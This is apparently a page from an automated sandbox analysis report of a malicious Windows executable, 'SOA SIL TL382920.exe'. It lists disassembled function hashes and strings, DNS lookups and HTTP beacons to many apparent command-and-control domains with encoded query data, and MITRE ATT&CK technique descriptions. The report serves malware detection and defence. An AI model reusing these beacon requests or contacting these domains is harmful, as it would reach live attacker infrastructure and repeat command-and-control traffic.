Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: dc23bb2c29d687085a9ed82704889bd0df8c1c7acc295c77c3a8ea62d260cd9d
Instruction ID: c0ba495946fdc687b921554dc333b698c09cfaf1824328afaabd5459c7c29c94
Opcode Fuzzy Hash: dc23bb2c29d687085a9ed82704889bd0df8c1c7acc295c77c3a8ea62d260cd9d
Instruction Fuzzy Hash: 1CD05E796802043BF600F6E98C0AF67368E9F04754F544468BA0CDB2C2ED66F01049A6

Function 031D2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2B44

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a2a48443976a852ab1a2b542638c2817ecb60d08405262ce97b819fb3eff562e
Instruction ID: 8bc176c20cf22862169e383d8d5717a7c5ecd22f9cf151285cb7c34fa9ffe46b
Opcode Fuzzy Hash: a2a48443976a852ab1a2b542638c2817ecb60d08405262ce97b819fb3eff562e
Instruction Fuzzy Hash: 40B09B719014C5C7DA11D7604708B177D0467D5701F15C455D5560641E8779C091F175

Non-executed Functions

Function 030604E0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.23445916095.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3060000_replace.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da03bb1647414b2966241f2aab4bee761bd08e26e881d3d85a46897fa50558fe
Instruction ID: 1f332c7a561c6e554610abfd648a994c9fd2a304675d43e098bb6701ca7c1b08
Opcode Fuzzy Hash: da03bb1647414b2966241f2aab4bee761bd08e26e881d3d85a46897fa50558fe
Instruction Fuzzy Hash: 4141167465DF0D4FD36CEF6890812B7B3E1FB89300F50062DD88AC3656EA70E8428789

Function 0306DE79 Relevance: 56.5, Strings: 45, Instructions: 218COMMON

Download Yara Rule

Strings

4567, xrefs: 0306DEFA
@@@@, xrefs: 0306DFEF
-./0, xrefs: 0306DF71
@@@@, xrefs: 0306E05F
@@@@, xrefs: 0306DF86
@@@@, xrefs: 0306E012
@@@@, xrefs: 0306E02E
@@@@, xrefs: 0306DFA9
@@@@, xrefs: 0306E00B
@@@@, xrefs: 0306DF47
@@@@, xrefs: 0306DFB7
@@@@, xrefs: 0306DFE1
@@@@, xrefs: 0306DF0F
@@@@, xrefs: 0306E051
@@@@, xrefs: 0306DF8D
@@@@, xrefs: 0306DFC5
@@@@, xrefs: 0306DFFD
@@@@, xrefs: 0306DFE8
@@@@, xrefs: 0306E043
@@@@, xrefs: 0306DF7F
@@@@, xrefs: 0306DFA2
%&'(, xrefs: 0306DF63
@@@@, xrefs: 0306E03C
@@@@, xrefs: 0306E027
@@@?, xrefs: 0306DEF3
@@@@, xrefs: 0306E035
89:;, xrefs: 0306DF01
123@, xrefs: 0306DF78
@@@@, xrefs: 0306E019
@@@@, xrefs: 0306DF9B
@@@@, xrefs: 0306DF94
?, xrefs: 0306E070
@@@@, xrefs: 0306DFB0
@@@@, xrefs: 0306DFD3
@@@@, xrefs: 0306E058
<=@@, xrefs: 0306DF08
@@@@, xrefs: 0306DFCC
@@@@, xrefs: 0306DFBE
@@@@, xrefs: 0306E004
@@@@, xrefs: 0306DFDA
@@@@, xrefs: 0306E020
@@@@, xrefs: 0306E04A
!"#$, xrefs: 0306DF5C
)*+,, xrefs: 0306DF6A
@@@@, xrefs: 0306DFF6

Memory Dump Source

Source File: 00000004.00000002.23445916095.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3060000_replace.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: 455d3afe252bf1a1d9da4ac1af255ef1517417b2bbda1d60b479b794f4b64423
Instruction ID: ad273f027ac42bd50f89335fb2876ba58c032a3b9ab3f4fe2756334c1d7b0a6a
Opcode Fuzzy Hash: 455d3afe252bf1a1d9da4ac1af255ef1517417b2bbda1d60b479b794f4b64423
Instruction Fuzzy Hash: CA913FF04082988AC7158F55A0612AFFFB5EBC6305F15816DE7A6BB243C3BE8945CB85

Function 03063B49 Relevance: 15.1, Strings: 12, Instructions: 66COMMON

Download Yara Rule

Strings

QTQM, xrefs: 03063C1D
VPTM, xrefs: 03063BD7
S<RS, xrefs: 03063BB4
PUCK, xrefs: 03063BDE
LVP, xrefs: 03063C32
MSMQ, xrefs: 03063C16
[ZC0, xrefs: 03063C24
C;CR, xrefs: 03063BAD
<WJC, xrefs: 03063BBB
VMSC, xrefs: 03063B7C
TMPU, xrefs: 03063C39
(+7., xrefs: 03063BE5

Memory Dump Source

Source File: 00000004.00000002.23445916095.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3060000_replace.jbxd

Similarity

API ID:
String ID: LVP$(+7.$<WJC$C;CR$MSMQ$PUCK$QTQM$S<RS$TMPU$VMSC$VPTM$[ZC0
API String ID: 0-1502675764
Opcode ID: ed9a13325f089e3dacc08f0fc00934b2e745267f0ddbb212eac848eb9ff45c00
Instruction ID: 4c0047a16904bef3ff787a82a8fdf06f88e91b293e19651ee994e638f0ab0c82
Opcode Fuzzy Hash: ed9a13325f089e3dacc08f0fc00934b2e745267f0ddbb212eac848eb9ff45c00
Instruction Fuzzy Hash: 2F3187B091474CDBCF14DF84D1446CDBFB2FB04314F819158E81A2E241DBB5865ACB89

Function 031C7550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0320454D
ExecuteOptions, xrefs: 032044AB
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03204460
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03204530
Execute=1, xrefs: 0320451E
CLIENT(ntdll): Processing section info %ws..., xrefs: 03204592
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03204507

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 2bfa0c97146962d56e1d69e177098a54c1cab7e829087725e821b9d4f21d2bce
Instruction ID: 093ecf1ba0f5d61512af6ee1068f486c255fa011035d80c347bbc67d46a03a87
Opcode Fuzzy Hash: 2bfa0c97146962d56e1d69e177098a54c1cab7e829087725e821b9d4f21d2bce
Instruction Fuzzy Hash: 2E51F935A103597FEF14EBA5EC55FAD73A8AF2C740F0804ADD905AB1C2DBB09A85CE50

Function 03199046 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

@wu, xrefs: 031F245B
$, xrefs: 031990B1
@, xrefs: 03199095

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID:
String ID: $$@$@wu
API String ID: 0-503205031
Opcode ID: 73f68b457fc8889df2b518907986b5955fc8f9ee81c290fb320700325c446c9d
Instruction ID: de2ea2a9b7d729626e4e308e7b17b370cfa68f1a890b4096346ae3274d626688
Opcode Fuzzy Hash: 73f68b457fc8889df2b518907986b5955fc8f9ee81c290fb320700325c446c9d
Instruction Fuzzy Hash: 4F815975D012699BDB35CF54CC44BEEB6B8AF08710F0545EAEA19B7280E7709E81CFA0

Source: C:\Windows\SysWOW64\replace.exe	Code function: 4x nop then xor eax, eax		4_2_028B9A70
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4x nop then mov ebx, 00000004h		4_2_030604E0

Source: Joe Sandbox View	IP Address: 217.160.0.27 217.160.0.27
Source: Joe Sandbox View	IP Address: 76.223.105.230 76.223.105.230

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /9eeu/?VzK4o8Jx=sYxoUF2rFRCkhaAkYvMCVRWDMjjY140d56kaE+tBLdvFK0LLAdAC/HAPE2DtjqQpoemNjozj05nG5pG/fmy7ZInj0cRDZa4AaOoOz07zrXAoLhIj+j079Eo=&0zu8A=o2yln6 HTTP/1.1Host: www.07t90q.vipAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4yov/?VzK4o8Jx=wLmY7AOB32o0S2u43NcX1Hs/A4Ddj7cy6rFAsgDZdNn+sW1g/TF+eJLR19ZQOPzynTi6ZGviANY3o1+5ycRVlJFFydx+2g9CgM5kEaITnei6fXkYmlY6f3w=&0zu8A=o2yln6 HTTP/1.1Host: www.concept.pinkAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /j39u/?VzK4o8Jx=Bz1f0c7bYWyPEXgQGmGeUr0iAf+T5y0lnFtnj2cpqvgmCRIzB1oQIQU/LvP87UgGwTfaSD+LVTW+9AK3Nxg5tSpiWXbGTNqEKdm6W6Th2Oxx8WLr56YoU0o=&0zu8A=o2yln6 HTTP/1.1Host: www.kuaimaolife.shopAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /pnbu/?VzK4o8Jx=PMosseOB4ogJQUQqTcR9kz6RlTRioPzkM9evra3bwBIimbDRItYfTtmn+Yd6ynIhbdr7j07NPWQxaS6b0vcIX3tyVS9+K21fIwIr7IsLGACriLVoa4wujys=&0zu8A=o2yln6 HTTP/1.1Host: www.nodigitalsmoke.orgAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /pisq/?VzK4o8Jx=H7+I56BzzgTO14iYyfpq/0TXLnkw0DU3mxqOdQDMcBjOXdIUFfgl3gtbee+L6DVRaRQz5ZravCeTSBENiaLmUfkQqiezYkWa8l0+pkZP8o0fG616lfZJ+EU=&0zu8A=o2yln6 HTTP/1.1Host: www.synd.funAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /phw5/?0zu8A=o2yln6&VzK4o8Jx=0nIKn1KaCpmASYJA4heXTZJ4jJXOLVPKLZ7pkMbHJLxIA/G7tzth6jzDxIdIFtsfCbXgmV5eiC0y9vkRZyS1XzB4D/cnp4pLqlHudh8ra46zD/kGcOWFXek= HTTP/1.1Host: www.redlakedispensery.netAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /6nb6/?VzK4o8Jx=3cQdvvjXbDmN7AD1N3EtkTKSkRGpjOZJD5QOEJ2ov7AVnEoT92w2clvWuemcxfAXa005+24inGIyqDI1tlEn9qii/G7LnY+t45dZlk7rRI6PB0gsuL5FdqU=&0zu8A=o2yln6 HTTP/1.1Host: www.online-dating28.xyzAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /io0i/?0zu8A=o2yln6&VzK4o8Jx=SDiZucYNl7hAWjD3kY1F3Wh8SSqKLzQrPgO87aM6gvawjY1J8DLcjr26gXoQ9oM68w0z/Zj56CIgKdiiaxfLyhFp6oFJlK6eDMjbU8To92G67g984b8BKfg= HTTP/1.1Host: www.tribevas.onlineAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /f3n5/?VzK4o8Jx=dhj1q08La8WFEWo3xk5bQlyPjuL1dgahmkpS3NRsd6Y/mAIsEkGjeuU1SXWIZ8LAwVs2eJKJ0+NM44t35YuY5s8XjK0+kf3wgV05m6WJetyMkfq7N/qTBt8=&0zu8A=o2yln6 HTTP/1.1Host: www.stratogent.infoAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /acqm/?0zu8A=o2yln6&VzK4o8Jx=hOk1k3UNcVwpG+EJEDicqQpIOObLS/TgyY32GlBOoCoiXDXAZ6sWDP89y5CwOebPWohVlvJHYhDsteptd/L7YydfwpVPpt2oIMR5Kfz9plXO/BQcfDKFtuw= HTTP/1.1Host: www.it9.shopAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /xha2/?VzK4o8Jx=Rj3U+6DKgT5y3eE2BMi55/myWWswXqjiYm6dEeLSFSW8ImASiPiK/Z97R8zSc/+3mi0fAgijIiRKCB5FCR8rSXkZ7dd1+8Uof6hMEnAJapLXT04qmHdwDH0=&0zu8A=o2yln6 HTTP/1.1Host: www.artherapy.onlineAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /xlle/?VzK4o8Jx=e/yKpeJOjOfK3ogdJaNPolEHTgG8UOeOD7iGn6rK8RtZqhJ0uS/fq3wrSOZm1/LpQx9nm8RE0LQ7pT1GOQTyowfApUFnsluh2+dA7bAmT6aj2geZl7SaSIo=&0zu8A=o2yln6 HTTP/1.1Host: www.acuarelacr.buzzAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /dh2t/?VzK4o8Jx=OuJ8gnv9Mf0seMPZwgWqdoiXcL8RlvinjfaO7Y1P7N6K2HIOPUsL5gVusZwNUZykZEqB/DbtgQZV6EtzKFIFDF8htWObdeNACruwjJyoWYmCvw6DdWzPF9Q=&0zu8A=o2yln6 HTTP/1.1Host: www.toteforcar.siteAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /dndz/?VzK4o8Jx=yDZaovUERiFyto7X7qjvD9MpBTu9Oa8KDn0njxLOrnMFAtvfChH9CxwY1KA18WTPaaKEsGuRWrl0dmOTwKqBuB4/VF8aV5DH590ef19Cm2H2f9K3TYb4rxM=&0zu8A=o2yln6 HTTP/1.1Host: www.neuro-practicum.onlineAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /vbsv/?VzK4o8Jx=bE1tu4Njqer8fYE3ogT5h7aBRb2mTTstgFdh6ULQtUw7pAI4rpm78pT6sJrtnBlXzUrAExT6FvXu50MEINd+YE6s/Zqjf6ffoiebp1emg4fruBFCNZ4S/qE=&0zu8A=o2yln6 HTTP/1.1Host: www.ara-store.comAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.07t90q.vip
Source: global traffic	DNS traffic detected: DNS query: www.concept.pink
Source: global traffic	DNS traffic detected: DNS query: www.5oxzis.top
Source: global traffic	DNS traffic detected: DNS query: www.kuaimaolife.shop
Source: global traffic	DNS traffic detected: DNS query: www.nodigitalsmoke.org
Source: global traffic	DNS traffic detected: DNS query: www.synd.fun
Source: global traffic	DNS traffic detected: DNS query: www.redlakedispensery.net
Source: global traffic	DNS traffic detected: DNS query: www.online-dating28.xyz
Source: global traffic	DNS traffic detected: DNS query: www.tribevas.online
Source: global traffic	DNS traffic detected: DNS query: www.stratogent.info
Source: global traffic	DNS traffic detected: DNS query: www.it9.shop
Source: global traffic	DNS traffic detected: DNS query: www.artherapy.online
Source: global traffic	DNS traffic detected: DNS query: www.acuarelacr.buzz
Source: global traffic	DNS traffic detected: DNS query: www.toteforcar.site
Source: global traffic	DNS traffic detected: DNS query: www.neuro-practicum.online
Source: global traffic	DNS traffic detected: DNS query: www.ara-store.com

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SOA SIL TL382920.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

